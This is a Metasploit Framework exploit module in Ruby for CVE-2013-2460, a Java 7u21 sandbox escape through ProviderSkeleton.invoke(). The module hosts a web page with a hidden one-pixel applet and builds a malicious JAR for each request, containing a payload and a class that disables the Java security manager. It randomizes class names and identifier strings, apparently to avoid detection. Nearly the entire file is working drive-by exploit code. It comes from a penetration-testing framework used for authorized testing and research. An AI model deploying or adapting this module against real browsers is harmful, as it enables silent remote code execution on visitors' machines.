GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
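# Browser exploit module for CVE-2013-2460 (ProviderSkeleton insecure invoke).
#
# The module serves a small HTML page that loads an applet; the applet JAR is
# assembled per request from the payload JAR plus three precompiled class files
# shipped in the framework data directory. Affected: Java 7u21 and earlier, per
# the Description below; the Oracle June 2013 CPU referenced below is the fix.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  # Literal class name compiled into the bundled Exploit.class. #setup rewrites
  # it to a random name of the same length.
  EXPLOIT_STRING = "Exploit"

  # Registers module metadata (name, references, targets, payload constraints).
  #
  # @param info [Hash] extra metadata merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Java Applet ProviderSkeleton Insecure Invoke Method',
      'Description' => %q{
This module abuses the insecure invoke() method of the ProviderSkeleton class that
allows to call arbitrary static methods with user supplied arguments. The vulnerability
affects Java version 7u21 and earlier.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC
          'Matthias Kaiser' # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2013-2460' ],
          [ 'OSVDB', '94346' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'],
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ]
        ],
      'Platform' => %w{ java linux osx win },
      'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets' =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2013-06-18'
    ))
  end

  # Replaces every occurrence of +identifier+ in the names and contents of the
  # JAR entries with a random alphabetic string of the same length.
  #
  # The replacement keeps the original length on purpose: it is applied to the
  # raw bytes of the entries (class files included), where a length change
  # could corrupt length-prefixed strings.
  #
  # @param jar [#entries] archive whose entries are rewritten in place
  # @param identifier [String] literal substring to replace
  # @return [void]
  def randomize_identifier_in_jar(jar, identifier)
    replacement = rand_text_alpha(identifier.length)
    jar.entries.each do |entry|
      entry.name.gsub!(identifier, replacement)
      entry.data = entry.data.gsub(identifier, replacement)
    end
    nil
  end

  # Loads the precompiled class files and randomizes the exploit class name,
  # then defers to the superclass (which starts the HTTP server).
  #
  # @raise [Errno::ENOENT] when one of the data files is missing
  def setup
    @exploit_class = read_class_file("Exploit.class")
    @provider_class = read_class_file("ExpProvider.class")
    @action_class = read_class_file("DisableSecurityManagerAction.class")

    # Same length as EXPLOIT_STRING so the rewritten class file stays well formed.
    @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length)
    @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name)

    super
  end

  # Routes a request from the connected browser.
  #
  # A URI ending in ".jar" receives the applet archive built from the current
  # payload; a URI ending in "/" receives the applet HTML (after regenerating
  # the payload for this client); anything else is redirected to the resource
  # root.
  #
  # @param cli [Object] client connection handed to the send_* helpers
  # @param request [#uri] incoming HTTP request
  # @return [void]
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_applet_jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # Named +regenerated+ rather than +payload+ so the local does not shadow
      # the payload accessor used by build_applet_jar.
      regenerated = regenerate_payload(cli)
      unless regenerated
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, "#{get_resource}/", '')
    end
  end

  # Renders the page that loads the applet.
  #
  # The archive name is a random alphabetic string of 3 to 7 characters; the
  # code attribute is the randomized exploit class name chosen in #setup.
  #
  # @return [String] HTML document
  def generate_html
    archive = "#{rand_text_alpha(rand(5) + 3)}.jar"
    %Q|
<html>
<body>
<applet archive="#{archive}" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
</body>
</html>
|
  end

  private

  # Reads one of the precompiled class files shipped under
  # data/exploits/cve-2013-2460 in binary mode.
  #
  # @param name [String] file name inside that directory
  # @return [String] raw file contents
  # @raise [Errno::ENOENT] when the file does not exist
  def read_class_file(name)
    File.binread(File.join(Msf::Config.data_directory, "exploits", "cve-2013-2460", name))
  end

  # Assembles the applet archive: the encoded payload JAR plus the three
  # class files loaded in #setup, with the "metasploit" and "payload"
  # identifiers randomized and a manifest generated.
  #
  # @return [Object] the jar object, ready to be sent with send_response
  def build_applet_jar
    jar = payload.encoded_jar
    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file("ExpProvider.class", @provider_class)
    jar.add_file("DisableSecurityManagerAction.class", @action_class)
    randomize_identifier_in_jar(jar, "metasploit")
    randomize_identifier_in_jar(jar, "payload")
    jar.build_manifest
    jar
  end
end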